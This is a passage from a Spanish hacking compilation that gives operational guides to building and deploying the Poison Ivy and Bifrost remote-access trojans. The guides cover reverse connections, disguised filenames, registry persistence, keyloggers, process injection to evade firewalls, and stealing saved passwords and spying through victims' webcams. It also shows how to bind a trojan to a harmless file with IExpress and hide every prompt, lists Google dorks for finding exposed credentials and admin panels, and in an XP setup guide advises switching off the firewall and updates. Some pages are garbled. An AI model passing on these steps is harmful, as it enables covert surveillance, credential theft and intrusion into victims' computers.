Para compilarlo, primero necesitaremos un compilador, que variar segn el lenguaje en el que se halla
escrito / programado el cdigo fuente del exploit. A continuacin, dejo listado los posibles compiladores
segn el lenguaje de programacin:

C: Para este lenguaje, podemos usar el GCC, el Turbo C, etc.








Trojanos

Manual Troyano Poison Ivy 2.1
By Blero
DESCARGALOS DESDE HTTP://WWW.ALE666.COM

Bueno, si estn leyendo esto supongo que es porque ya saben que es un troyano as que para no profundizar
en el tema me limitare a explicarles como funciona este en especial. Intentar hacer este manual de la forma
ms sencilla posible ilustrndolo con imgenes y flechas para evitar errores. Bueno vamos all.

Una vez descargado el troyano y descomprimido encontraran un icono llamado poison ivy 2.1.0, es ah
donde deben dirigirse. Una vez abierto les aparecer la siguiente pantalla


para configurar el server iremos a la pestaa de build donde nos encontraremos lo siguiente
www.ale666.com


El Libro Mestro__________________________________________ - 67 -


En dns port pincharemos a la derecha donde pone add y nos aparecer lo siguiente


www.ale666.com


El Libro Mestro__________________________________________ - 68 -

Este troyano utiliza la conexin inversa por lo que en vez de conectarte t a la vctima ella se conecta a ti
por lo que en dns debemos poner nuestra direccin ip si es esttica o nuestra cuenta no-ip si es dinmica.
En port aparece el puerto por el que nos vamos a conectar que podemos dejar ese o cambiarlo. Despus de
haber puesto vuestra ip o no-ip y el puerto haremos clic en test Connections, si todo es correcto aparecer
un smbolo verde de confirmacin a la izquierda de la ip que hayamos puesto, en caso contrario aparecer
una cruz roja que indica que o la ip no es correcta o ese puerto esta ocupado o cerrado, en el caso de un
router.

Una vez que tengamos el signo de confirmacin haremos clic en OK y volveremos a salir a la ventana
anterior.

En ID pondremos el nombre de la victima que vayamos a infectar y en password la contrasea que le
queramos poner.

Marcaremos el cuadradito de Startup que editara una entrada en el registro de la victima.

En filename pondremos el nombre con el que queramos que quede el server una vez ejecutado por la
victima. Elegiremos un nombre que no sea sospechoso, por ejemplo: w32rcb.exe y marcaremos copy file
to: system folder si queremos que se le guarde a la victima en la carpeta de system32 o windows folder
si queremos que se le guarde en la carpeta de windows. Yo personalmente marcara system folder.

Los siguientes recuadros significan lo siguiente:

- Melt: lo marcaremos si queremos que una vez que la victima ejecute el archivo este desaparezca por arte
de magia.
- keylogger: marcando este tendremos la utilidad de keylogger en el troyano, es decir, podremos saber todo
lo que escribe nuestra victima desde el momento en que quede infectada. Indispensable.
- Persistence: marcaremos este si queremos que el Server no se pueda borrar fcilmente.

Process mutex y keylogger mutex lo dejaremos como esta.

A la derecha aparece icon donde podremos ponerle un icono al Server

Una vez est todo listo haremos clic en build, situado abajo a la derecha. Bien ya tenemos el Server creado
que seguramente nos aparecer en la carpeta donde tengamos el poison ivy pero antes de salir he infectar
iremos a la pestaa de settings donde nos aparecer lo siguiente:
www.ale666.com


El Libro Mestro__________________________________________ - 69 -


Lo que debemos poner aqu es el mismo puerto que habamos puesto antes y la misma contrasea, lo dems
podemos dejarlo como est. Cuando est listo pincharemos en Save abajo a la derecha. nos dirigiremos
ahora a la pestaa de connections y minimizamos, una vez minimizado el poison Ivy aparecer en la barra
de tareas esperando una nueva conexin.

Bien ahora es el momento de envirselo a una vctima, recomiendo comprimirlo para enviarlo ya que
algunos programas como el Messenger no dejan mandarlo con la extensin .exe.

Una vez que le victima lo ejecute.eureka!, aparecer en la barra de tareas un pequeo mensaje saliendo
del icono del poison ivy que nos informara de que la victima se ha conectado. Bien, ahora explicaremos las
funciones del troyano, es decir, lo que podemos hacer con la vctima. Pinchamos sobre el icono de poison
ivy y nos aparecer una ventana como esta
www.ale666.com


El Libro Mestro__________________________________________ - 70 -


en esta ventana nos aparecern todas las vctimas, en este caso solo hay una as que haremos doble clic
sobre ella y nos encontraremos lo siguiente:

www.ale666.com


El Libro Mestro__________________________________________ - 71 -

a la izquierda se encuentran todas las funciones del troyano desplegadas, ahora vamos a ir una por una:

-information: como su nombre indica, muestra informacin sobre el ordenador infectado.
-Files: aqu encontramos el disco duro de la victima donde podemos subirle archivos y ejecutarlos ya sea
de forma normal u oculta, bajarnos a nuestro PC archivos suyos se vera de la siguiente manera:


Tambin incluye la funcin search que se utiliza para buscar archivos en su disco duro indicando su
nombre, tamao

-regedit: muestra el registro del sistema que tambin podemos modificar a nuestro antojo e incluye la
funcin search, al igual que en files, para buscar entradas del registro.
-Processes: muestra los procesos del sistema al igual que si en nuestro PC hacemos ctrl+alt+supr y vamos
a procesos
www.ale666.com


El Libro Mestro__________________________________________ - 72 -


el proceso indicado en rojo es el que esta utilizando nuestro troyano, que como podis observar se camufla
como un proceso de Internet Explorer, este proceso no lo debemos tocar ya que perderamos la conexin
con la vctima, si os fijis, los procesos con las letras mas claras corresponden al antivirus, en este caso el
Norton Antivirus. Estos procesos tambin los podemos modificar a nuestro gusto.

-services: aqu nos encontramos con el denominado service manager en el que podemos encontrar una lista
de servicios del sistema y controladores de hardware que podemos editar, instalar, desinstalar, etc.
-Windows: con esta funcin veremos que ventanas tiene abiertas pudiendo capturarlas en una imagen,
enviar letras de nuestro teclado o cerrarlas.
-Relay: esta funcin no estoy muy seguro para que sirve, pero parece que es para conectarse a otras PCS
mediante el mismo troyano.
-Active ports: en este lugar aparecen todos los puertos abiertos o en escucha donde tenemos posibilidad de
cerrarlos, capturar paquetes de datos
-Remote shell: con esto podremos abrir una shell, es decir, una consola de ms2 en la PC infectada
pudiendo utilizar cualquier comando, una funcin muy interesante ; )
-Password list: otra funcin muy interesante, sobre todo para los obsesos con el robo de cuentas de
Hotmail, yahoo, Outlook esta ventana nos muestra los nombre de usuario y contraseas de las cuentas
que haya guardadas en el equipo.
-Keylogger: si activaste la opcin al configurar el Server, aqu aparecern todas las teclas que haya pulsado
la vctima en su ordenador desde el momento en que quedara infectado.
-Screen capture: como su nombre indica se utiliza para capturar la pantalla de la victima, es decir, para ver
en nuestro ordenador lo que l est viendo. Se pueden elegir varios tamaos, intervalo de actualizacin de
la imagen
-Webcam capture: para mi esta funcin es la que se lleva la guinda, si la victima tiene instalada una
webcam en su PC podemos activarla sin que se entere y ver a la persona que esta detrs del PC infectado.
-Share: esta funcin se utiliza para compartir el troyano con otra persona, donde tendremos que indicar su
ip, puerto, password que le quiera poner, etc.
-Update: se utiliza para actualizar el Server a otro que tengamos, pedir seleccionar un archivo .exe donde
pondremos nuestro nuevo Server y listo.
www.ale666.com


El Libro Mestro__________________________________________ - 73 -
-Restart: con esta funcin se reinicia el Server, se utiliza en el caso de que tuviramos algn problema.
-Uninstall: cuando queramos borrar el Server del PC de la victima daremos a esta opcin.
Bueno pues hemos terminado, espero que les haya servido de ayuda o aclaracin. Un saludo.

Blero


Bifrost
By Daperci

DESCARGALO DE HTTP://WWW.ALE666.COM

La intencion de este manual es ayudar a los que recien empiezan, a entender cmo funciona un troyano.
Para eso , seguimos usando de ejemplo el Bifrost.

Cuando abrimos nuestro cliente aparecera:




En el primer tutorial ya explicamos para que servia el boton SETTINGS Y BUILDER.

UPDATE: Actualiza el server cuando estamos conectados a una victima.
UPLOAD PLUGIN: Sube a la pc remota el plugin del troyano.

Si todo estaba bien configurado y enviamos con exito nuestro troyano, cuando se ejecute en la pc remota
seremos notificados y en nuestro cliente empezarn a aparecer nuestras victimas.


www.ale666.com


El Libro Mestro__________________________________________ - 74 -


Aqui tendremos el siguietne detalle:

ASSIGNED NAME: El nombre que le pusimos al crear el server, para indentificar a nuestra victima. Si no
le pusmos nada, figurar default.
IP: La IP de nuestra victima.
COMPUTER USER NAME: El nombre de la PC de nuestra victima.
VERSION: La version del troyano que estamos usando.
C: Si tiene camara para poder ser capturada.
PING: Demora en la trasmision de los paguetes entre nosotros y nuestra victima.

Si seleccionamos haciendo doble click en una de nuestras victimas detalladas aparecer la siguiente
ventana:



www.ale666.com


El Libro Mestro__________________________________________ - 75 -
Con las siguientes opciones:

SYSTEM INFO: Nos muestra la configuracion de nuestro server instalado en la pc remota.

Dentro de esta opcion tambien encontramos:
UNINSTALL: Para desinstalar el troyano en la PC remota.
UPDATE: Para actualizar el troyano en la PC remota.
RECONNECT: Para reconectarse.
CLOSE SERVER: Para cerrar el troyano en la PC remota.
RESTART SERVER: Para reconectarse con el troyano en la PC remota..

PROCESS LIST: Nos muestras los procesos que estan corriendo en la PC remota.
WINDOWS LIST: Nos muestra el titulo de las ventanas abiertas en la PC remota.
PASSWORD LIST: Nos muestra las passwords guardadas en la PC remota.

El boton refresh, cuando es presionado actualiza la inforamcion visualizada en en la ventana.

Si hacemos un click derecho sobre alguna de nuestras victimas, se abrir el menu contextual con las
siguientes opciones:




FILE MANAGER: Para intercambiar archivos como si fuera el Explorador de Windows


www.ale666.com


El Libro Mestro__________________________________________ - 76 -


SYSTEM MANAGER: Es igual que cuando hacemos doble click sobre una victima como explicamos
arriba.
SCREEN CAPUTURE: Captura la Pantalla de la PC remota.



www.ale666.com


El Libro Mestro__________________________________________ - 77 -

CAM CAPTURE: Igual que el anterior, pero con la camara
RE

de la PC Remota en caso de tener.
MOTE SHELL: Accedemos al Shell de la PC Remota.




KEY LOGG
PC

ER: Activamos el Key Logger online o offline, para capturar todo lo que sea tecleado en la
remota.



FIND PASSWORDS: Busca las passwords que esten guardadas en
CHANGE NAME: Nos permite cambiar el ASSIGNED NAM
la PC remota.
E.
www.ale666.com


El Libro Mestro__________________________________________ - 78 -
CO

PY IP: Copiamos en el clipboard la IP de la PC remota.

erando el Server
brimos el cliente


Gen

A


N

os aparece la ventana principal del Cliente.




Pr

esionando la tecla "settings" vamos a configurar lo siguiente:



Password: ponemos la contrasea de nuestro server , para

que solo
nuestro cliente pueda comunicarse con l.
www.ale666.com


El Libro Mestro__________________________________________ - 79 -

Port: aqui pon


msn style notification: seleccionamos esta opcion para que cuando


Ahora seleccionamos la opcion Builder.
N

demos el puerto que quedar escuchando nuestro
cliente.
se comunique nos avise con una ventanita tipo messenger.
os va a aparecer la ventana para generar el server.




DNS / IP1: Aqu por el momento pondremos 127.0.0.1 o localhost. De esta forma podran probar como
funciona el troyano, ejecutandolo en su pc. Para poder comunicarte con tu vi
IP fija o en caso d
en

CONNEC
infe

DNS / IP2 y DNS / IP: Dejaremos vacios.
PORT: Pondremos el puerto por el cual nos notificar.
PA

STARTUP: Aqui se configura la entrada que se genera en el registro de
la PC de nuestra vicitima, con el propsito de que el
au

REGISTRY KEY: Es el nombre de la llave que se crear en el registro.
Es importante que pongas un nombre que no
confundirse con algo referido a Windows..
REGISTRY RUN LOCAL MACHINE - REGISTRY RUN CURRENT USER -
ctima aqui deberas poner tu
e tener IP dinamica tendrias que configurar un cuenta
NO-IP.com.
TION: Aqu se configura como seremos notificados cuando el troyano sea ejecutado en la PC
ctada.
SSWORD: Repetimos la misma contrasea que pusimos en Settings.
troyano se ejecute
tomaticamente cada vez que se reinicie la PC.
llame la atencion y pueda
www.ale666.com


El Libro Mestro__________________________________________ - 80 -
RE

INSTALLATION: Aqui se configura el nombre de nuestro server que se instal
vicitima una vez ejecutado el troyano, como asi tambien donde ser instalado.
FILE NAME WHEN INSTALLED: El nombre que tendr el servidor instalado en la pc remota. Es
fundamental que el n
llamar la atencion.
ASSIGNED NAME: No tiene mucho sentido. Pero la fi
referencia a cada troyano para poder individualizarlos.
SYSTE
instale.
MELT SERVER: Seleccionamos esta opcion pa
una vez que se ejecute. Asi no dejamos rastros.
DELAYED START UP: Seleccionamos esta opcion si queremos que el troyano se
dem

PL

INCLUDE PLUGIN1: Esta opcin siempre seleccionada. Si quieres pue
ventana de al lado, sino puedes dejarle el nombre que trae por defecto.
OFFLINE KEYLOGGER: No la seleccionamos para no aumentar el tamao del server. Luego tenemos la
posibilidad de subrsela cuando estam
el R

IN

Es importante seleccionar esta opcion, la cual no permitira inyectar a nuestro troyano en algun proceso d
la pc remota, con lo cual podremos vulnerar mas facilmente a los firewalls que puedan estar insta
Puedes seleccionar iexplore.exe si quieres que se injecte en el Internet Explroer por ejemplo. Si
seleccionas esta op
pre

A

Esta opcion te permite comprimir el tamao del server.
NO LA SELECCIONAMOS, ya que cuando
fun


En

GISTRY ACTIVE X METHOD: Se aconseja seleccionar las tres opciones, para ser mas efectivos.
ar en la PC de nuestra
ombre que pongamos sea muy similar a alguna otra aplicacion de Windows para no
nalidad de esta opcion es asignarle un nombre de
M DIRECTORY O WINDOWS DIRECTORY: Seleccionamos donde queremos que el server se
ra que cuando nuestro troyano se auto-elimine de la pc
ejecute en forma
orada y no en el mismo momento que se instala en la pc remota.
UGIN
des cambiarle el nombre en la
os conectados con la PC remota. La finalidad de este plugin es activar
emote Offline Keylogger.
IJECTION:
e
lados.
cion y no pones ningun proceso, por defecto el troyano se inyectar en el explorador
determinado.
UTOPACK:
quieras modificar tu server para hacerlo indetectable es
damental hacerlo antes de comprimirlo.
Resumen la ventana tendria que quedar asi por ejemplo.

www.ale666.com


El Libro Mestro__________________________________________ - 81 -



BUILD: Seleccionamos esta opcion para que se genere el server en el mismo directorio que tenemos
nuestro cliente. Se generar SERVER.EXE.



Te aparecer este mensaje que te dice que si quieres compactar el server con otro compresor, lo hagas
ahora.
No lo comprimimos y presionamos Aceptar.

Nuestro server ya ha sido creado.


www.ale666.com


El Libro Mestro__________________________________________ - 82 -




Hackeando con google

No muchos le prestan atencion a la capacidad de busqueda de google, y si bien con el tiempo, Google
mismo, impide ciertas busquedas, (por haberse metido en problemas), aun hoy es possible encontrar una
cantidad de cosas muy utiles.

Este apartado esta dedicado a eso, como utilizar google para sacarle un poco mas del provecho habitual
Esta busqueda aparecio en muchos lugares hacienda que muchas companias modificaran sus bases
Ve a google y busca "Select a database to view" (incluye las comillas), nos dara resultados de bases de
datos,



Muchas pueden ser utiles, muchas no, lo cierto es que hoy por hoy son bases de datos compartidas pero
es possible que se cuele alguna que No Deberia ser compartida.

Asi mismo podriamos buscar por ejemplo viewdatabase.html dado que muchas bases de datos
construyen su propio visor para html, y lo hacen en este formato.

Google nos permite buscar, determinados tipos de documentos, mas aun ahora que , el mismo google
ofrece editor de documentos online, y espacio para guardarlos y compartirlos ( aunque en muchos casos
se supone compartir, solo con ciertos usuarios)

Puedes hacer busquedas especificas tales como: *.doc; *pdf; *.pps; *.xls; *.rtf; *.ps; *.db; *.mdb
www.ale666.com


El Libro Mestro__________________________________________ - 83 -
Por cierto no se queden en la primer hoja de busqueda, yo prefiero comenzar desde atras, ya que seran
supuestamente datos menos visitados, o menos relevantes, (en cuanto a su ranking web, no a su contenido)

Si podemos buscar este tipo de documentos, se podrian tambien buscar otros?
Pues si, tipo *.cfg; o mejor aun *.pwd, o *.dat estos tambien los buscara
Pero mejor aun, si lo buscaramos en google nos podria dar cualquier tipo de informacion, pero lo
podriamos buscar dentro de las webs

Para eso utilizaremos Inurl: nuestrabusqueda de esta manera google buscara lo que le pedimos, dentro de
las webs y no como informacion.

Asi entonces hariamos busquedas del tipo Inurl: *pwd, esto no es una busqueda amigable y de cuando en
cuando nuestro amigo google responde







Hay muchas ideas, las cuales se pueden aplicar, nos frenara tan solo la imaginacion.

Inurl: admin; o tal vez Inurl: administrator o podria ser Inurl: root

Mas opciones de busqueda, Probemos con index of * pudiendo ser tambien index of admin; index
of administrator; index.of.admin
En todos los casos las comillas las utilizamos, para que busque las palabras tal cual las escribimos, y no se
desvie buscando los terminos por separado ( tambien util en una busqueda normal)

En muchos casos podrias obtener listado de los files del administrador, etc, ( por otro lado, ya se ha tratado
la busqueda interna dentro de una web)

Otra opcion de busqueda es utilizar Intitle, que nos permite buscar por documentos html, que contengan
como titulo lo que estamos buscando, a veces muy util
Ejemplo intitle:hacked by o algo como Intitle:System o tal vez Intitle:root
www.ale666.com


El Libro Mestro__________________________________________ - 84 -



Quieres buscar que sitios tienen link hacia otros? Tenemos la opcion LinkRecuerden que muchas webs,
pueden estar hosteadas, en servidores propios de un compania, y posiblemente tengan links a su red local.
Cosa que seria bastante util.

Probemos link ale666.com









Asi es descubierto a uno de los administradores de nuestra web posteando, hacienda publicidad.
Para los que nos visitan, sabran quien es

www.ale666.com


El Libro Mestro__________________________________________ - 85 -

Aqui hay otros operadores de busqueda.

_ intitle, allintitle
_ inurl, allinurl
_ filetype
_ allintext
_ site
_ link
_ inanchor
_ daterange
_ cache
_ info
_ related
_ phonebook
_ rphonebook
_ bphonebook
_ author
_ group
_ msgid
_ insubject
_ stocks
_ define


www.ale666.com


El Libro Mestro__________________________________________ - 86 -

Busquedas combinadas

Tan solo la mezcla de algunas busquedas
Algo asi como site:paginax.com filetype:mdb restricted lo que hariamos seria estar buscando en paginax,
archivos del tipo mdb (base de datos), que contengan la palabra restringido (restricted)

O busquedas del tipo site:forox filetipe:txt password

O tambien la combinacionde Site:paginax index of root, admin, o password

Busquen informacion sobre cosas como que nombre tienen los archivos de configuracion en muchos
casos son .cfg , por lo que podriamos buscar, config.cfg; admin.cfg; users.cfg; setup.cfg y esto combinarlo
con otras busquedas.

Inurl:user.cfg index of ???

Utilizacion para busqueda de webadmin.
Webadmin, es una aplicacion para la edicion remota de contenido web.
La pagina inicial, para este servicio es llamada webeditor.php, asi que si buscaramos

Inurl:webeditor.php podras encontrarte con algunas de las paginas de login para este servicio.
Ganar acceso es otra historia, para eso esta el brutus aet, cain, webcracker, etc.

Pero google les podra decir, donde hay objetivos.

Ahora bien, con todos los sistemas de portales, existents, el uso indiscriminado de .php para casi toda la
web, alcanzaria, con mirar alguno de los instaladores, de estos portales, para encontrar que nos podria
interesar,

Admin.php; administrator.php; fileupload.php, login.php son solo algunas posibilidades.

Que sucede ahora se me ocurre otra idea tantas web online controladas por panel.html, cpanel.html,
xpanel.html

Podria buscar dentro de cada una de la que elija. De echo se puede.

Recuerdese el uso de operadores como AND para buscar en el contenido , dos palabras, OR, para buscar
una u otra, NOT, para omitir ciertas otras, la utilizacionde admin+password el simbolo +,
Asi como el de ( no se debe dejar espacios vacios entre las palabras buscadas, cuando se utilizan
simbolos.

Probemos esta busqueda en google

Probemos esto http://www.google.com/search?q="la coleccion de trojanos" si bien nosotros utilizamos
espacios vacios, seguramente nuestro explorador los lleno con %20 cuando hizo la busqueda.

Esto no sucede si la busqueda la lanzamos desde MsDos, pero si funcionara si utilizamos los caracteres que
utiliza google.

Prueben sino desde una ventana de msdos ( inicio run escribir cmd darle a enter, y en la ventana escribir
start
http://www.google.com/search?q="la coleccion de trojanos"
http://www.google.com/search?q="la%20coleccion%20de%20trojanos"

el Segundo funcionara correctamente.
www.ale666.com


El Libro Mestro__________________________________________ - 87 -

Como esta accion, hay otros caracteres, que nos ayudarian a reducer nuestras busquedas,
Lo que esta entre parentesis son variables a utilizar. ( )

q - pedido de busqueda
start -(numero) para escoger la cantidad de resultados en primera pagina
num maxresult (de 1 a 100) cantidad de ewsultados por pagina
filter (0 o 1 ) 0 mostrara resultados repetidos, 1, intentara mostrar una unica vez cada resultado
restricted (codigo de restriccion) restricciones para busqueda de determinados paises
hl (codigo de lenguaje) para que google sepa en que idioma mostrar las respuestas.
lr restringe el resultado a un unico lenguaje
ie la forma de codificacion a utilizar UTF-8
as_epq busqueda de una frase
as_ft incluye o excluye un tipo de archive elegido
as_rq (URL) buscara paginas sinilares a la que buscamos
as_lq (url) Localiza paginas que linkean a la nombrada.


La lista es mayor, pero ya tienen la idea,
El mismo google les dira el resto, al igual que los codigos de busqueda por paises , los de lenguaje y demas.
Conclusion Google en una herramienta muy util, recuerden que google tambien tiene Advance,

Y que no es para lo unico que sirve, la herramienta de google de trtanslacion de idiomas, sirve como
servidor proxy, tan solo con transladarla al mismo idioma de origen.
































www.ale666.com


El Libro Mestro__________________________________________ - 88 -



Como Bindear Archivos con Iexpress (binder que trae windows):
By J ulian (juli_1506)
1-Primero que todo vamos a Inicio-Ejecutar- y escribimos iexpress



2-Una vez abierto tenemos dos opciones para elegir; elegimos Create New Self Extraction Directive File
y clickeamos siguiente



3- Ahora en Package Purpose elegimos la opcion Extract File And Run An Installation Command y le
damos a siguiente



4-Nos aprarece el siguiente paso(Package Title) en donde tenemos que poner un nombre que va a tener la
ventana de dialogo. Le ponemos el nombre que queramos y continuamos

www.ale666.com


El Libro Mestro__________________________________________ - 89 -


5- En Confirmation Prompt (le da la opcion al usuario-victima- de confirmar la instalacion de nuestro
archivo bandeado) seleccionamos la opcion No Prompt y luego siguiente



6- Nos aparece License Agrement( da la opcion de mostrar una licencia al usuario-victima- antes de la
instalacion) y seleccionamos Do Not Display A License para no levantar sospechas.



7- El paso a seguir es el de agregar los archivos que vamos a bindear ( en mi caso el servidor de un troyano
server.exe- y una animacin en flash Animacion Flash.exe-); y para eso clickeamos en el boton Add,
buscamos los archivos que queramos bindear y le damos a siguiente.

www.ale666.com


El Libro Mestro__________________________________________ - 90 -


8- Ahora tenemos que configurar que queremos que se extraiga y se instale primero, y que archivo segundo
(en mi caso server.exe primero y Animacin Flash.exe despus), y luego siguiente



9- Ahora, en Show Windows, seleccionamos la recomendada que es Default y click en siguiente.


www.ale666.com


El Libro Mestro__________________________________________ - 91 -
10- Una vez hecho esto, no da la opcion de poner un mensaje que le va a parecer al usuario victima-
despus de la instalacion. En mi caso no pongo ninguno entonces selecciono No Message.



11- Ahora seguimos con las opciones, el nombre y el destino de nuestro archivo. Clickeamos en el boton
Browser y elegimo el nombre de nuestro archivo y donde lo queremos guardar.
Debajo no da dos opciones, de las cuales elegiremos la primera Hide File Extracting Progress Animation
From User (lo que hace esta opcion es esconder la barra de progreso de la extraccin de los archivos y que
es lo que se extrae). Le damos a siguiente y estamos a solo 2 pasos de terminar, as que paciencia.



12- La opcion que sigue nos da la opcion de reiniciar la pc despus de la extraccin e instalacion de
nuestros archivos, as que seleccionamos No Restart para no levantar sospechas.

www.ale666.com


El Libro Mestro__________________________________________ - 92 -


13- La ultima opcion antes de terminar no pregunta si queremos guardar el proyecto, as que cliqueamos en
Dont Save



14- Y ahora si, el paso mas facil, solo presionar SIGUIENTE para que nuestro archivo bandeado quede
terminado:


Y listo, solo nos queda cerrar el IExpress presionando finalizar, y mandar nuestro archivo.

Aclaracion: El icono que tiene el archivo es la famosa Computadorita de insalacion:
www.ale666.com


El Libro Mestro__________________________________________ - 93 -

Pero pueden reemplazarlo con alguna herramienta como el ResHacker para que nos quede mas disimulado:

Bueno, espero que les haya servido y que puedan mandar sus archivos bandeados tranquilamente.
Un saludo



































www.ale666.com


El Libro Mestro__________________________________________ - 94 -


Como instalar y configurar una PC con Windows XP

Esto es tan solo para dar un panorama de cual seria un setup standard para buen rendimiento, partiendo de 0
instalando, o configurando la PC por primera vez

-Materiales una PC, Cd de Windows, Cd con Drivers, Software.

Si estamos en un Network, o detras de un router, escojamos una Ip para nuestra PC.
(ejemplo) 192.168.1.100

Iniciar PC. Insertar Windows CD, y reiniciar

En muchos casos las PCs Viejas, necesitan configurarse en la BIOS para poder butear desde el CD.

Asi que prestar atencion en el inicio de la Bios, alli, nos dira que tecla presionar para entrar en el setup. Y
cambiar el boot para el cd en primer lugar.

Si todo va correcto , arrancara el cd, o nos dira presione una tecla para arrancar desde el cd.

Lo hacmos
El proceso es bastante sencillotan solo seguir los pasos
En caso de ser una reinstalacion, elegir la particion donde ira nuestro XP ( habitualmento es en el disco 0 o
c: pedirle que borre la particion, nos pedira confirmar , y borrara la particion

Todo rastro de nuestro antiguo XP ha sido borrado
Elegir la particion recien borrada para la nueva instalacion
Y dejar que el proceso continue, nos preguntara el serial, la configuracion de idioma y teclado

Reiniciara un par de veces por si sola..
Casi al terminar la instalacion, Nos pedira varios datos

Tipo password del administrador ( escoger uno y no dejarlo en blanco)
De que forma conectamos a internet ( en nuestro caso estamos en un Lan o Network , porque tenemos un
router y una ip privada)
Asi que pedimos configurarla manualmente
Ingresamos la IP escogida 192.168.1.100
Submask 255.255.255.0
DNS 192.168.1.1
Gateway 192.168.1.1
Esos son datos para el ejemplo, pero serian validos para el 80% de los routers.
Elejimos nuestro nombre de usuario

Y a grandes rasgos estariamos iniciando nuestro windows xp por primera vez.
Opciones como registrarse, ayuda en la seguridad, firewall, puede ponerse NO

Al iniciar nuestro Nuevo xp solo tendremos la papelera en nuestro escritorio.
Por lo que creamos un acceso directo desde inicio, y ponemos My PC en el escritorio.

Hacemos boton derecho sobre My PC elegimos manage o administrar
De la ventana abrimos Local Users and Groups.., en Users, veremos el nombre de usuario que elegimos.
Vas a tu nombre, lo marcas, haces boton derecho, y elijes set password
Pon alli tu password.
www.ale666.com


El Libro Mestro__________________________________________ - 95 -
Aplicas, le das doble click a tu nombre y te fijas que en grupos formes parte de los Administradores. ( el
Primer Usuario siempre lo es)
En caso de que no, tan solo le das a agregar, en la nueva ventana, click en advanced
La ventana se expande, le das al boton Find now (buscar ahora)
Y de la lista de abajo, elijes administrator, click OK, OK,OK

Dale doble click a tu PC ve a Tools (del menu de arriba) (herramientas); Folder Option (opciones de
carpeta); View (Ver); desmarca la opcion Automatically search for network folders and printers.( buscar
automaticamente carpetas de red he impresoras),
Y si piensas compartir info entre las PCs de tu network, puedes desmarcar la ultima Opcion Use simple file
sharing ( utilizar compartir simple)
De la opcion Carpetas y archivos ocultos: marca, Show Hidden Files And Folders (mostrar carpetas y
archivos ocultos).
Desmarca Hide extensions for Know files types( esconder extenciones conocidas)
Puedes tambien desmarcar la siguiente que es Hide Protected Operating system files (ocultar archivos del
sistema)
Aplicas los cambios.
Vas al Panel de Control Abres el Firewall y le pones OFF (igual es inutil) aplicar
Abre User accounts: elige la opcion, Change de way Users log on or off, (cambiar la forma en que los users
se loguean)
Desmarca la ultima opcion, y luego la primera aplicar
Abre Security Center, de la Izquierda elige Change the way Security Center alerts me
Desmarca las 3 opciones y aplica ( el cartelito dejo de molestar)
Abre ahora add remove programsde la izquierda elije add/remove windows components
La primer opcion marcada es Accessories and Utilities, le das click a details
Desmarca games ( si no los utilizes) luego chequea de que en accesorios utilices todo, sino lo borras.
Desmarca MSN Explorer ( nadie lo utiliza),
Desmarca Outlook express (si no lo utilizes, o si no sabes lo que es)
Desmarca Windows Messenger
Le das a next, y ya.
Del panel de Control ( que deberia estar abierto aun) elije Automatic Update, y ponle OFF

Cierra el panel de control. Y reinicia la PC.
En el login ahora te pedira tu password.
Carga los drivers ( si es necesario)

Ve a Inicio, programas, y de arriba elije Windows Update.
Realize esta operacion dos o tres veces, hasta que diga que no hay mas Updates.
Debes reiniciar en el proceso.

Terminado esto. Recomiendo desfragmentar el disco C , abrir MY PC, boton derecho sobre C elegir
Propiedades de alli la lengueta Tools ( herramientas) y de alli la opcion del medio Desfragment Now. ( si
eres muy quisquilloso, puedes realizar esta operacion 2 o 3 veces hasta lograr compactar todo en un unico
bloque azul.

Reinicia.
Luego ve a mi PC has boton derecho Propiedades, ve a la lengueta de advance
Y dale click a settings de la primer opcion (Performance), alli ve a la lengueta central Advanced, y abajo
versa Virtual Memory y un boton change (cambiar)

Le das click
Aqui debemos tener en cuenta algo.
Cuantos discos duros fisicos tenemos dentro de nuestra PC?
Si es un solo disco duro , marcamos C: mas abajo custom size, y en Inicial siza (tamao inicial) pones
como valor el DOBLE de lo que tienes de RAM (ejemplo sit u ram es de 1024, en valor inicial pondras
2048)
www.ale666.com


El Libro Mestro__________________________________________ - 96 -
Como valor final, pondras el doble del valor inicial. Le das al boton SET y listo

Si tienes dos discos duros, marca C: elige No paging file le das a SET
Elijes tu Segundo disco duro Ejemplo D: y ali elijes custom size en el valor inicial, comienza con el
mismo valor de tu RAM, y en el Final eliges El triple de tu RAM.

Le das al boton set. Ok ( no reinicies aun), si quieres mayor performance ( major rendimiento de tu equipo,
ve nuevamente a la primer lengueta y en Efectos visuals, desmarca TODO, o elije la opcion Best
performance.
Se vera como win 2000 o 98, cierras todo
Tu PC ya en este momento se comporta mas veloz.
Si quieres recuperar la forma y color de las barras Xp, sin perder performance, tan solo click derecho en el
escritorio, y en apariencia escojes, xp.

En este mismo momento elije el wallpaper, screensaver, tiempo, y en opciones de energia, el tiempo en que
se apagara el monitor y los discos duros

( yo prefiero que nada se apague)
Presiona Ctrol+Alt+Del, chequea cuantos procesos tienes corriendo
Toma una captura de todos los processos corriendo, y guardala.


En la barra, haz boton derecho propiedades, y configurala a tu gusto y ganas, borra , todo lo que no utilices,
muchas veces los drivers nos dejan entradas en el menu inicio Programas, que jamas utilizamos
Quitalas.. al igual que las opciones que no utilizes del menu

En este momento si estas conforme, puedes crear un Nuevo punto de restauracion, desde herramientas del
sistema.
Y guarder una copia de tu registro desde inicio/Run/ regedit/ y del menu elijes exportar.

Basicamente tienes en este momento una PC lista, faltaria comenzar a instalar el software que sueles
utilizar, aunque parezca tonto, es muy bueno desfragmentar, cada vez que se install algo. Hacienda que
todos los archivos de ese programa se encuentren en un mismo sector del disco.























www.ale666.com


El Libro Mestro__________________________________________ - 97 -










COMO PROTEGER TU PC

A menudo nos preguntamos qu podemos hacer ante cada una de las amenazas que se encuentran en
Internet.
Las amenazas a nuestra seguridad no las resuelve un solo programa por sofisticado y completo que nos
parezca, aunque existen suites de seguridad que aglutinan varios modos de proteccin para nuestro equipo
como antivirus, firewall, control de contenidos Web, antiespias etc.
Entre las suites de seguridad ms utilizadas y reconocidas se encuentran las de Norton, Mcafee, Panda y
Kaspersky.

En realidad, el asunto de la seguridad es algo que no slo depende de todos los programas que vigilan
nuestro equipo, sino tambin de nosotros mismos. Aqu el factor humano (o sentido comn) es tan
importante como las estrategias de seguridad que implementamos con los programas adecuados.

A continuacin voy a describir lo que todos deberamos tener instalado en nuestros equipos para poder usar
nuestro PC y navegar mucho ms seguros, aunque tambin hay que decir que por mucho que nos
protejamos, todo sistema de seguridad es susceptible de ser vulnerable:


1. Un antivirus.

Los virus son programas que se introducen en nuestros ordenadores de formas muy diversas y que pueden
producir efectos no deseados y nocivos. Una vez el virus se haya introducido en el ordenador, se colocar
en lugares donde el usuario pueda ejecutarlos de manera no intencionada, ya que para que el virus acte, es
